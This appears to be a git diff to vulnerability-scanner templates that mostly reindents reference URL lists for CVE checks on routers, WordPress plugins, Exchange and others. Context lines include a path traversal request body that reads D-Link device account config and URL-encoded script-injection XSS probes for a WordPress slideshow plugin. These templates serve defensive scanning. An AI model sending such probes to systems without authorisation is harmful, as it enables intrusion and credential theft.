+ - https://twitter.com/sec715/status/1373472323538362371
requests:
- raw:
diff --git a/vulnerabilities/generic/cache-poisoning.yaml b/vulnerabilities/generic/cache-poisoning.yaml
index 7b9022bf80..fa843b73a4 100644
--- a/vulnerabilities/generic/cache-poisoning.yaml
+++ b/vulnerabilities/generic/cache-poisoning.yaml
@@ -5,8 +5,8 @@ info:
author: melbadry9,xelkomy
severity: info
reference:
- - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
- - https://portswigger.net/research/practical-web-cache-poisoning
+ - https://blog.melbadry9.xyz/fuzzing/nuclei-cache-poisoning
+ - https://portswigger.net/research/practical-web-cache-poisoning
tags: cache,generic
requests:
diff --git a/vulnerabilities/lsoft/listserv_maestro_rce.yaml b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
index 40ac26b75f..93b0ddba80 100644
--- a/vulnerabilities/lsoft/listserv_maestro_rce.yaml
+++ b/vulnerabilities/lsoft/listserv_maestro_rce.yaml
@@ -6,8 +6,8 @@ info:
severity: info
description: CVE-2010-1870 Struts based OGNL remote code execution in ListSERV Maestro before and including version 9.0-8.
reference:
- - https://www.securifera.com/advisories/sec-2020-0001/
- - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
+ - https://www.securifera.com/advisories/sec-2020-0001/
+ - https://packetstormsecurity.com/files/159643/listservmaestro-exec.txt
requests:
- method: GET
diff --git a/vulnerabilities/oracle/oracle-ebs-xss.yaml b/vulnerabilities/oracle/oracle-ebs-xss.yaml
index 0ec5474ea2..b684437823 100644
--- a/vulnerabilities/oracle/oracle-ebs-xss.yaml
+++ b/vulnerabilities/oracle/oracle-ebs-xss.yaml
@@ -6,9 +6,9 @@ info:
severity: medium
tags: oracle,xss,ebs
reference:
- - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
- - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
- - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
+ - https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
+ - http://www.davidlitchfield.com/AssessingOraclee-BusinessSuite11i.pdf
requests:
- method: GET
diff --git a/vulnerabilities/other/buffalo-config-injection.yaml b/vulnerabilities/other/buffalo-config-injection.yaml
index 5c7a5ce8c2..ba678d6928 100644
--- a/vulnerabilities/other/buffalo-config-injection.yaml
+++ b/vulnerabilities/other/buffalo-config-injection.yaml
@@ -7,9 +7,9 @@ info:
description: |
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.
reference:
- - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
- - https://www.tenable.com/security/research/tra-2021-13
- - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
+ - https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild
+ - https://www.tenable.com/security/research/tra-2021-13
+ - https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2
tags: buffalo,firmware,iot
requests:
diff --git a/vulnerabilities/other/concrete-xss.yaml b/vulnerabilities/other/concrete-xss.yaml
index 44e6d5fa62..57ec254a12 100644
--- a/vulnerabilities/other/concrete-xss.yaml
+++ b/vulnerabilities/other/concrete-xss.yaml
@@ -7,9 +7,9 @@ info:
severity: medium
tags: concrete,xss,cms
reference:
- - https://hackerone.com/reports/643442
- - https://github.com/concrete5/concrete5/pull/7999
- - https://twitter.com/JacksonHHax/status/1389222207805661187
+ - https://hackerone.com/reports/643442
+ - https://github.com/concrete5/concrete5/pull/7999
+ - https://twitter.com/JacksonHHax/status/1389222207805661187
requests:
- method: GET
diff --git a/vulnerabilities/other/dlink-850L-info-leak.yaml b/vulnerabilities/other/dlink-850L-info-leak.yaml
index 254efe51b6..6d3d77235f 100644
--- a/vulnerabilities/other/dlink-850L-info-leak.yaml
+++ b/vulnerabilities/other/dlink-850L-info-leak.yaml
@@ -12,7 +12,7 @@ requests:
path:
- "{{BaseURL}}/hedwig.cgi"
body: |
- ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
+ ../../../htdocs/webinc/getcfg/DEVICE.ACCOUNT.xml
headers:
Cookie: uid=R8tBjwtFc8
Content-Type: text/xml
diff --git a/vulnerabilities/other/maian-cart-preauth-rce.yaml b/vulnerabilities/other/maian-cart-preauth-rce.yaml
index 03dc459bca..d9a923a421 100644
--- a/vulnerabilities/other/maian-cart-preauth-rce.yaml
+++ b/vulnerabilities/other/maian-cart-preauth-rce.yaml
@@ -6,9 +6,9 @@ info:
severity: critical
description: A severe vulnerability has been kindly reported to me by security advisor DreyAnd. The issue concerns the elFinder file manager plugin in Maian Cart and it affects all versions from 3.0 to 3.8.
reference:
- - https://dreyand.github.io/maian-cart-rce/
- - https://github.com/DreyAnd/maian-cart-rce
- - https://www.maianscriptworld.co.uk/critical-updates
+ - https://dreyand.github.io/maian-cart-rce/
+ - https://github.com/DreyAnd/maian-cart-rce
+ - https://www.maianscriptworld.co.uk/critical-updates
tags: rce,unauth,maian
requests:
diff --git a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
index a138c0ceb1..0eac266103 100644
--- a/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
+++ b/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml
@@ -5,8 +5,8 @@ info:
author: infosecsanyam
severity: medium
reference:
- - https://www.shodan.io/search?query=http.title%3A%22Outlook%22
- - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
+ - https://www.shodan.io/search?query=http.title%3A%22Outlook%22
+ - https://blog.orange.tw/2021/08/proxyoracle-a-new-attack-surface-on-ms-exchange-part-2.html
tags: miscrsoft,exchange,owa,xss
requests:
diff --git a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
index c03bb02530..a1913d882f 100644
--- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
+++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
@@ -5,8 +5,8 @@ info:
author: dhiyaneshDk
severity: medium
reference:
- - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
- - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
+ - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
tags: exposure,config,lfi,nginx
requests:
diff --git a/vulnerabilities/other/opensns-rce.yaml b/vulnerabilities/other/opensns-rce.yaml
index 57dc49ae6e..5bccb904ea 100644
--- a/vulnerabilities/other/opensns-rce.yaml
+++ b/vulnerabilities/other/opensns-rce.yaml
@@ -5,8 +5,8 @@ info:
author: gy741
severity: critical
reference:
- - http://www.0dayhack.net/index.php/2417/
- - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
+ - http://www.0dayhack.net/index.php/2417/
+ - https://www.pwnwiki.org/index.php?title=OpenSNS_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
tags: opensns,rce
requests:
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index 5d4a64ee03..393ae08a2a 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -9,8 +9,8 @@ info:
# This template supports the user creation part only.
# To triggering an RCE, see reference[2].
reference:
- - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
- - https://www.exploit-db.com/exploits/48878
+ - https://www.rconfig.com/downloads/rconfig-3.9.5.zip
+ - https://www.exploit-db.com/exploits/48878
requests:
- raw:
diff --git a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
index 417e1cbc8a..95c345c98a 100644
--- a/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
+++ b/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml
@@ -5,8 +5,8 @@ info:
author: PR3R00T
severity: critical
reference:
- - https://twitter.com/chybeta/status/1353974652540882944
- - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
+ - https://twitter.com/chybeta/status/1353974652540882944
+ - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/
tags: shellshock,sonicwall,rce,vpn
requests:
diff --git a/vulnerabilities/other/wooyun-path-traversal.yaml b/vulnerabilities/other/wooyun-path-traversal.yaml
index 515f1293b5..3956371181 100644
--- a/vulnerabilities/other/wooyun-path-traversal.yaml
+++ b/vulnerabilities/other/wooyun-path-traversal.yaml
@@ -6,9 +6,9 @@ info:
severity: high
reference: https://wooyun.x10sec.org/static/bugs/wooyun-2015-0148227.html
description: |
- A general document of UFIDA ERP-NC contains a vulnerability
- (affecting a large number of well-known school government and enterprise cases
- such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
+ A general document of UFIDA ERP-NC contains a vulnerability
+ (affecting a large number of well-known school government and enterprise cases
+ such as COFCO/Minsheng E-commerce/Tsinghua University/Aigo)
tags: lfi
requests:
diff --git a/vulnerabilities/other/yapi-rce.yaml b/vulnerabilities/other/yapi-rce.yaml
index d3c9c3cab1..5fc0d294da 100644
--- a/vulnerabilities/other/yapi-rce.yaml
+++ b/vulnerabilities/other/yapi-rce.yaml
@@ -6,10 +6,10 @@ info:
severity: critical
tags: yapi,rce
reference:
- - https://www.secpulse.com/archives/162502.html
- - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
- - https://twitter.com/sec715/status/1415484190561161216
- - https://github.com/YMFE/yapi
+ - https://www.secpulse.com/archives/162502.html
+ - https://gist.github.com/pikpikcu/0145fb71203c8a3ad5c67b8aab47165b
+ - https://twitter.com/sec715/status/1415484190561161216
+ - https://github.com/YMFE/yapi
requests:
- raw:
diff --git a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
index a536f56a59..4e45972403 100644
--- a/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
+++ b/vulnerabilities/wordpress/wordpress-woocommerce-sqli.yaml
@@ -6,8 +6,8 @@ info:
severity: critical
tags: wordpress,woocomernce,sqli,wp-plugin
reference:
- - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
- - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
+ - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021
+ - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx
requests:
- method: GET
diff --git a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
index bf94656f63..4a0d110f9c 100644
--- a/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
+++ b/vulnerabilities/wordpress/wordpress-wpcourses-info-disclosure.yaml
@@ -7,8 +7,8 @@ info:
description: Critical Information Disclosure on WP Courses plugin < 2.0.29 exposes private course videos and materials
tags: wordpress,plugin
reference:
- - https://www.exploit-db.com/exploits/48910
- - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
+ - https://www.exploit-db.com/exploits/48910
+ - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/
requests:
- method: GET
diff --git a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
index 5b19ad3ae3..5b4e1dba05 100644
--- a/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
+++ b/vulnerabilities/wordpress/wp-123contactform-plugin-listing.yaml
@@ -6,8 +6,8 @@ info:
severity: info
description: Searches for sensitive directories present in the wordpress-plugins plugin.
reference:
- - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
- - https://www.exploit-db.com/ghdb/6979
+ - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html
+ - https://www.exploit-db.com/ghdb/6979
tags: wordpress,listing
requests:
diff --git a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
index b4305c81e7..991edafc3b 100644
--- a/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
+++ b/vulnerabilities/wordpress/wp-memphis-documents-library-lfi.yaml
@@ -7,8 +7,8 @@ info:
tags: wordpress,wp-plugin,lfi
description: Arbitrary file download in Memphis Document Library 3.1.5
reference:
- - https://www.exploit-db.com/exploits/39593
- - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
+ - https://www.exploit-db.com/exploits/39593
+ - https://wpscan.com/vulnerability/53999c06-05ca-44f1-b713-1e4d6b4a3f9f
requests:
- method: GET
diff --git a/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/vulnerabilities/wordpress/wp-slideshow-xss.yaml
index 61a03ab44b..a2ef9e9166 100644
--- a/vulnerabilities/wordpress/wp-slideshow-xss.yaml
+++ b/vulnerabilities/wordpress/wp-slideshow-xss.yaml
@@ -11,9 +11,9 @@ requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
-# - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+ # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+ # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
+ # - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E'
matchers-condition: and
matchers:
diff --git a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
index 82c7b74499..08ee90fd10 100644
--- a/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
+++ b/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml
@@ -6,9 +6,9 @@ info:
severity: medium
description: Allows attacker to view sensitive information such as company invoices
reference:
- - https://twitter.com/sec_hawk/status/1426984595094913025?s=21
- - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
- - https://woocommerce.com/products/pdf-invoices/
+ - https://twitter.com/sec_hawk/status/1426984595094913025?s=21
+ - https://github.com/Mohammedsaneem/wordpress-upload-information-disclosure/blob/main/worpress-upload.yaml
+ - https://woocommerce.com/products/pdf-invoices/
tags: wordpress,listing,exposure
requests: